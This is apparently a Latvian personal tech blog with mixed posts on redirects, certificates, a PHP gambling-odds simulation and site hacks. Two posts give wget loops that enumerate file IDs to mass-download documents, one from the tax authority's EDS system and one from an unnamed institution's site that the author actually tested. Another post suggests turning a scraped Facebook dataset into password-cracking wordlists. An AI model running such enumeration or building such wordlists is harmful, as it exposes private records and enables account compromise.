Kā aizliegt WEB pārlūkam (firefox)veikt servera pusē uzliktu redirect

Rakstot iepriekšējo post bija nepieciešams pārbaudīt vai pirms redirekta no hanzanet.lv ir uzstādīts jaunos sertifikāts.
Vieglākais kā to izdarīt manupŗat bija aizliegt pārlūkam veikt auto redirect.
Firefox to var izdarīt šādi:
Atveram konfig failu- adreses vietā irakstām about:config
Atrodam- network.http.redirection-limit
un vērtību aizstājam ar 0.
Pēc eksperimenta nomainām uz kādu gribās.
Pārlūku nav nepieciešams pārstartēt.

Hanzanet.lv lapai novecojis drošības sertifikāts

Šodien atverot hanzanet.lv, lai pārbaudītu cik izdevies pa brīvdienām notrallināt mani pārsteidza interesanta lieta.
No sākuma iedomājos, ka kāds mēģina MITM (Man-in-the-middle attack) vai proxy serveris sācis pārtvert arī drošos savienojumus, tomēr papētot izrādās, ka vienkārši ir beidzies sertifikāta derīguma termiņš.
https://ib.swedbank.lv/ sertifikātu viss ir kārtībā.
Ņemot vērā, ka no hanzanet.lv ir vienkāršs redirekts, nekāda lielā bēda nav un iespējams Swedbanka vairs hanzanet.lv domēnam sertifikātu nepagarinās, tomēr ikdienas lietotājam tas var liekties biedējoši un kādu interneta lietotāju aizbaidīt. Tāpēc, lai tā nenotiktu banka varētu:

  • vai nu sertifikātu pagarināt,
  • vai uz redirektu noņemt sertifikātu,
  • vai mežonīgākais- noņemt hanzanet.lv,

lai tādi iesūnojuši lietotāji, kas baksta hanzanet.lv vairs neuztrauktos un iemācītos lietot jauno adresi.

Turpinot tēmu par varbūtību un dubultošanas metodi

Vakar papētīju kāda ir varbūtība nevinnēt vairākas reizes pēc kārtas arī pie varbūtības 50/50.
Rezultāts bija diezgan šokējošs- 29 reizes.
Tāpēc mājās pamodificēju skriptu, lai noskaidrotu kāda iespēja neuzminēt vairākas reizes pēc kārtas, ka iespēja laimēt ir 70% un 95%.
To izdarīju izmainot uz :

//$gad1=rand(1,100);
$gad2=rand(1,100);
//if ($gad1<=50){$pirmais=1;} else {$pirmais=2;}
if ($gad2<=70){$otrais=1;} else {$otrais=2;}
$pirmais=1;

Rezultāti?
Arī šoreiz negaidīti..
Pie varbūtības uzminēt 70%, pēc kārtas varēja kļūdīties max 24 reizes, bet pie 95%- 6 reizes.
Kaut kā neticas, ka ir iespējams tik daudz reizes pēc kārtas kļūdīties pie 95%.
Iespējams, ka pie vainas ir rand funkcija, kura tiešām neatgriež unikālu rezultātu, tāpēc, kad būs laiks paeksperimentēšu ar random.org piedāvātiem skaitļiem.
Bet ja nu tomēr šie aprēķini ir precīzi, tad tas atspoguļo tikai vienu- dubultošana nestrādā, jo gan kazino, gan forexā diez vai var iegūt situāciju, kad par labu spēlētājam būs vairāk kā 70% un arī pie šāds situācijas saglabājas ļoti augsta iespēja iegrābties daudzas reizes pēc kārtas.
Tāpēc atliek tradicionālais spēlēt pie iespējas “vairāk par 50%” un samierināties ar ienākumiem, kas paliek pāri starp ieguvumiem un zaudējumiem.

50/50, aizraujošā informātika vai kāpēc nestrādā dubultošanas metode?

Nu tā, šodien pamodos un izdomāju pārbaudīt praksē visiem zināmo patiesību, kāpēc dubultošanas metode (gan kazino- rullete, utt) nestrādā.. vai varbūt strādā?

Man jau liekas loģiski, ja ir divas iespējas (piemēram, sarkans un melns), tad diezgan ātri vajadzētu pienākt reizei kad varētu uzminēt sarkanu vai melnu :)

Nu ko domāts darīts, vajag izskaitļot cik tad ir iespējams reizes praktiski neuzminēt? (lai saprastu cik vajadzētu $, lai kaut ko vinētu).

Teorija saka, ka katrā reizē iespējams uzminēt 50/50, tas nozīmē, ja neesi uzminējis 10 reizi, tad iespēja uzminēt pareizi 11tajā reizē arī ir tikai 50/50 :( Bet loģika saka ko citu- cik tad reizes var nepaveikties?

Tāpēc izveidoju simulācijas modeli, kurš noteiks cik reizes ir iespējams pēc kārtas kļūdīties?

Un kādi rezultāti? Interesanti…

Līdz šim biju lasījis vairākus rakstus, kur bija teikts, ka šī metode nestrādā… un kāpēc?

  • tāpēc, ka, lai pēc vairākām neveiksmes reizēm mēs riskējam ar daudz reiz lielāku summu (pēc dubultošanas), nekā varam iegūt (piemēram, ja sākam ar 5ls, tad pēc 10 neveiksmes reizēm mums jau ir nepieciešams 2560 uz gājienu uzlikt, lai beigās vinnētu tikai 5ls :( )
  • jebkurā gājienā uzminēt iespēja ir tikai 50/50
  • daudzās grāmatās ir rakstīts, ka šī metode strādā, bet tikai līdz vienai reizei, tas nozīmē, ka sākumā var gūt panākumus, bet vienmēr pienāks reize, kad zaudēsiet..

Protams te var runāt par riska apetīti un cik mēs esam gatavi riskēt, lai kaut ko iegūtu, bet ne par to ir stāsts.

Un tam seko rezultāti…

Lai tie maksimāli būtu ticami, eksperimentu atkārtoju z reizes un veicu i reizes..

Kādi rezultāti?

Lai neteiktu vairāk bēdīgi..

Izveidoto skriptu atkārtoju gan uz Linux, gan uz W7 un rezultāti ir gaužām atšķirīgi..

Uz linux pēc kārtas bija iespējams maksimāli neuzminēt 29 reizes..

Uz w7 pēc kārtas bija iespējams maksimāli neuzminēt 14 reizes..

Kāpēc varētu šie rādījumi atšķirties?

Nezinu, iespējams vaina ir rand funkcijā, kura uz win un lin izpildās dažādi.

Sākumā biju izmantojis rand funkciju starp 1 un 2 (rand(1,2)), tad win gadījumā rezultāts bija vēl cerīgāks (max 11 reizes pēc kārtas neuzminēt), bet kad izmainīju algoritmu, lai nosaka vērtību starp 100 un, ja ir zem 50, tad iegūt vērtību 1 un pretēji 2, tad ieguvu 14 reizes un visu laiku vienādu. Linux gadījumā katru reizi rezultāts tomēr mainījās, bet starpību starp rand (1,2) un rand(1,100) nejutu.

Kāpēc es visu šo iesāku? sākumā priekš sevis, lai saprastu, kāda tad ir faktiskā iespēja kļūdīties x reizes pēc kārtas un pēc tam uzskatīju par nepieciešamību parādīt citiem kas Jūs sagaida, ja nolemsiet dubultot..

Kādi tad ir mani secinājumi?

No eksperimenta sanāk, ja tev ir nauda un iespēja (kas rulletē nav, jo ir ierobežojums uz maksimālo likmi) dubultot vismaz vairāk kā 30 reizes sākotnējo likmi, tad karogs tev rokā (bet ņem vērā, ka var arī nepaveikties arī 30 reizē :) ).

Pretējā gadījumā Jums var paveikties arī vairākas reizes, bet kādreiz pienāks diena Z, kuru labāk nepiedzīvot.
Lūk mans testa modelis:


<?php
//izpildes laika aprēķinam
$mtime = microtime();
$mtime = explode(" ",$mtime);
$mtime = $mtime[1] + $mtime[0];
$starttime = $mtime;
// beigas laika aprēķinam
echo "Parbaudam varbūtības praktisko pusi";

//ar šo ciklu atkārtosim mērījumus z reizes, lai iegūtu pēc iespējas ticamāku rezultātu
$max_max_katra_reize=0; //mainīgais, kurā glabāsies atkārtoto mērījumu gadījumā maksimālais neuzminētais skaits pēc kārtas
for ($z=1;$z<=1000;$z++)
{
$max_katra_reize=0; //mainīgais, kas saturēs maksimālo nesakritības reizi katrā piegājienā (i ciklā, nevis z ciklā)
$skaits=0; //cik reizes pec kārtas nesakritīs konkrētā mērījumā (i cikls)
$max_skaits=0; //maksimālais skaitlis cik reizes pēc kārtas ir nesakritis konkrētā mērījumā (i cikls)

for ($i=1;$i<=100000;$i++){ //cikls, kurš simulēs konkrēto mērījumu
$gad1=rand(1,100);
$gad2=rand(1,100);
if ($gad1<=50){$pimais=1;} else {$pirmais=2;}
if ($gad2<=50){$otrais=1;} else {$otrais=2;}
/*
$pirmais=rand(1,2); //iegūstam pirmo nejaušo vērtību
$otrais=rand(1,2); //iegūstam otro nejaušo vērtību
*/
//echo "$pirmais $otrais
";
if ($pirmais!=$otrais){ //ja abas vērtības nesakrīt, tad palielinam pēc kārtas nesakritušo vērtību
$skaits=$skaits+1;
}
if ($pirmais==$otrais){ //ja abas vērtības sakrīt, tad pēc kārtas nesakritušo vērtību nonullējam
$skaits=0;
}
if ($skaits>$max_skaits){ //iegūstam maksimālo nesakritušo vētību katrā mērījumā, lai nav jāizvada viss liekais
$max_skaits=$skaits;
$max_katra_reize=$max_skaits;
//echo "
Maksimālais nesakritušo reižu skaits3: $max_katra_reize
";
}
} //beidzas konkrētā mērījuma cikls (i cikls)
//pēc cikla beigām esam ieguvuši maksimālo skaitli $maz_katra_reize, kurā glabājas vērtība cik maksimāli pēc kārtas reizes nesakrita abi skaitļi

if ($max_katra_reize>$max_max_katra_reize){ // tagad izvadīsim cik tad bija maksimālais nesakrītības reizes pēc mērījuma un to atkārtojot z reizes pieņemamās pārliecības iegūšanai
$max_max_katra_reize=$max_katra_reize;
echo "Maksimālais nesakritušo reižu skaits: $max_max_katra_reize
";
}
} //beidzas atkārtoto mērījumu cikls (z cikls)

//laika aprēķinam
$mtime = microtime();
$mtime = explode(" ",$mtime);
$mtime = $mtime[1] + $mtime[0];
$endtime = $mtime;
$totaltime = ($endtime - $starttime);
echo "Lapa tika aprēķināta ".$totaltime." sekundēs";

?>

NIC.lv pret Spamhaus vai arī labs ne vienmēr nozīmē labs

Atgadījumu ar Spamhaus jau ir komentēts un apspriests daudz kur, piemēram, Apollo.lv vai Pods.lv un ir pieejams raksts arī theregister.co.uk.

Īsam ievadam- bija izveidojusies situācija, ka liela daļa LV IP nonāca epasta black listā un tāpēc daudziem korekti nestrādāja epasts.
Beigās pievienoju no ISACA paneļdiskusijas ierakstu- kas tad īsti bija noticis un kāpēc tas nav tik vienkārši, nevainīgi vai labi (nemākam angļu valodu- Spamhaus atrakstīšanās „are the result of language barriers” vai paši vainīgi), kā izklausās no sākuma.
Ieraksts diezgan sliktā kvalitātē un bez iespējas paskatīties prezentāciju, bet iespējams uzzināsiet ko jaunu.
vlc2
vlc2
Un tāpēc gribēju uzsvērt pāris lietas, kuras, manuprāt, neparādījās ne vienā no šiem (pods, apollo, datuve) resursiem:
• paralēli tam arī tika bloķēts Latnet epasta serveris, kuram nebija nekāda sakara ar negadījumā iesaistītām IP adresēm (Tāpēc ir ļoti pamatotas NIC dusmas, jo tā bija liela Spamhaus kļūda).

Windows update error Nr 80072F8F

Pēc drauga datora pārinstalācijas dators nevarēja saņemt tam nepieciešamos atjauninājumus un izdeva kļūdas paziņojumu nr 80072F8F.
Ilgu laiku nevarēju saprast ko tas nozīmē- lamāju XP draiverus, jo W7 atbalsta tiem vairs nebija (laptops morāli novecojis) iekams nodomāju pagooglēt. Pēc 1min jau kļuva skaidrs- problēma datora datuma iestatījumos. Nezin kāda iemesla pēc- laiku rādīja korekti, bet mēnesis bija ar nobīdi. Izlaboju un viss aizgāja.

Man tas liekās interesanti, jo XP laikos ar tādu kļūdu nebiju saskāries un neredzu tam arī nekādu nepieciešamību- PC aizsūta savu pašreizējo stāvokli un update serveris atgriež nepieciešamos updates, kam tur vēl pa vidu ir nepieciešams lokālais datora laiks?

Aizsargāts: Atpūtas programma 2

Šis raksts ir aizsargāts ar paroli. Lai to lasītu, lūdzu ievadiet paroli:

Parole:

Bezmaksas hostings

Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.

Cerams kādam noderēs.

Dell piegādā serverus ar mātesplātē ievietotu ļaundabīgu kodu

Šodien izlasīju rakstu Zdnet par to, ka Dell ir gadījies fušieris un ir piegādātas nelielu partiju ar mātesplatēm ar tajās ievietotu ļaundabīgu kodu.

Diemžēl nekas sīkāk nav zināms, izņemot to, ka Dell to ir oficiāli atzinis un ievainojamas ir tikai Win operētājsistēmas.

Līdzīgs atgadījums, manuprāt, bija kādu gadu atpakaļ, kad HDD ražotājs jau no rūpnīcas piegādāja cietos diskus ar tajos ielādētu vīrusu vai ko tamlīdzīgu.

Principā tagad jau jākļūst par paranoiķi… Kam lai vēl uzticas, ja jau Dell arī gadās šādi brāķi?

Mēģinām pielietot EDS konstatēto ievainojamību citur

Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.

Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.

Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.

Linux gadījumā tas varētu izskatīties šādā veidā:

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Bet tā kā mājās stāv W7, un no LiveCD ielādēties ir slinkums izvēlējos garāko ceļu.

wget komandai ir arī windows alternatīva, kuru var atrast GNU lapā.

Pēc instalēšanas un notūnēšanas, lai to varētu palaist no jebkuras vietas var ķerties pie nākamā soļa- atrast mājaslapu, kurā ir līdzīga ievainojamība.

Otrs un pareizākais variants būtu radīt šādu ievainojamību kādā savā lapā un tad testēt, bet šoreiz atzīšos, esmu par slinku.

Pēc dažām minūtēm tika atrasta diezgan lielas iestādes lapa, kurā ir līdzīgs gadījums. Pēc http://……lv/file.php?id=, id lauka vērtībā mainot vērtības tiek piedāvāts nolādēt dažādus failus.

Lielākā daļa no testā atklātiem dokumentiem (daži bija php faili, kurus diez vai admins vēlējās, lai varētu nolādēt) ir arī brīvi pieejami no mājaslapas, tā kā uzskatu, ka tā ir funkcionalitāte, nevis trūkums :)

Mājaslapas adrese ir izmainīt, lai kārtējais tīnis neapciemo šo lapu un …..

Nu tad pie testa un rezultātiem.

Lai wget un for cikls strādātu uz win, tas ir jāmodificē- man sanāca šāds brīnums:

for /l %%i in (1,1,1000) do (wget -r “http://……..file.php?id=%%i”)

Izskatās easy, bet..

visi iegūtie faili ir nevis nosaukums.paplašinājums, bet:

.file.php?id=1

.file.php?id=2

.file.php?id=3, utt

Ja zinātu, ka visi nolādētie faili ir viena tipa, piemēram, *.doc, tad varētu vienkārši visus pārsaukt par *.doc un lietot laimīgs.

Bet problēma ir tajā, ka starp šiem failiem ir gan pdf, php, doc un sazin vēl kas.

Meklēju risinājumu šai problēmai iekš googles, bet neko prātīgu neatradu. Daudzi ir uzdevuši šādu jautājumu, bet nevienam nebija atbilde.

Vienīgais, ko atradu ir izmantojot -o mainīgo noteikt uzreiz faila nosaukumu, bet šāds piegājiens der tikai, ja tiek nolādēts viens fails un jau ar zināmu paplašinājumu. For ciklā tas nestrādā.

Kāds ir secinājums?

Nolādēt failus ir gaužām vienkārši arī praksē, tikai pēc tam var nākties izlabot failu paplašinājumu.

Manuprāt, problēma slēpjas tajā, ka šādā veidā notiek redirekts uz no file?id uz konkrētu failu, kuru wget programa nespēj korekti paņemt pretī.

Pods izsmiets vai vēsture atkārtojas

Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.

Un te seko nākamais pārsteigums- pods izsmiets.

Nu ko vēsture atkārtojas..

Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.

Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.

Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.

Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV

No sava Hackera neaizbēgsi :) .

Boot bīstama lapa vai arī boot ticis izsmiets

Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.

Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaspā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.

Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.

Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas :)

Kā tika nolādēti dati no VID EDS sistēmas?

Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.

Lejupielādēti un sistematizēti ap 100 miljonu facebook lietotāju datu

Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html

Raksta kopija:

Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.

An additional limitation is that these are only users whose first characters are from the latin charset. I plan to add non-Latin names in future releases.

Lejupielādētie dati tika saarhivēti bz2 datņu formātos un publicēti izmantojot BitTorrent.

Lejupielādējot 2.79 GiB datņu kopu, jebkurš iegūst šādas datnes:

Filename Description
-------------------------------------------------------------------------
facebook.rb The script used to generate these files (v1)
facebook.nse The script that will be used for the second pass (v2)
facebook-urls The full URLs to every profile
facebook-names-original All names, including duplicates
facebook-names-unique All names, no duplicates
facebook-names-withcount All names, no duplicates but with a count
facebook-firstnames-withcount All first names (with count)
facebook-lastnames-withcount All last names (with count)
facebook-f.last-withcount All first initial last name (with count)
facebook-first.l-withcount All first name last initial (with count)

Manuprāt, interesantākie ir facebook-urls (URL no izmantotajiem lietotājiem) un visi vārdi un uzvārdi.

No šīm datnēm var izveidot svaigu un aktuālu (!) vārdnīcu (wordlist) - paroļu, hash utml piemeklēšanai.

Jāpiezīmē, ka atarhivējot kādu no bz2 datnēm, to izmērs var sasniegt vairākus GiB tīra teksta, piemēram, facebook-urls.txt.bz2 ~1.3 GiB būs ~9.7 GiB.
Datņu atvēršanai jāizmanto tādas programmas, kas spēj tādu datu apjomu atvērt pakāpeniski.

Saite uz torrent datni: Facebook directory - personal details for 100 million users (download torrent) - TPB
Saite uz Ron Bowes bloga ierakstu: SkullSecurity » Blog Archive » Return of the Facebook Snatchers.

P.S. Kurš pirmais publicēs analoģiskus datus par draugiem.lv?

Ko tieši darīt ar šo info nezinu, bet kā saka, lai ir informācija- kā to pielietot izdomāsim.
Kā arī liek aizdomāties par publiskā telpā pieejamās informācijas nekaitīgumu.. jo kas Tev liekas nekaitīgs kādam var izrādīties medusmaize.

Uzlauzts Chrysler.lv

Šodien pamanīju, ka uzlauzta Chrysler.lv mājaslapa un lai saglabātu piemiņu par šo atgadījumu ierakstīšu nelielu post.

Cik noprotu lapa ir vienkārši nonesta, līdzīgi kā atgadījās ar mani un daudziem citiem.

Interesanti būtu uzzināt chrysler adminu novērojumus un veidu kā tas tika izdarīts, bet kā parasti par to tiks noklusēts :)

Ņemot vērā, ka lapa tika atjaunot vismaz rezerves kopija viņiem bija. Par to arī prieks.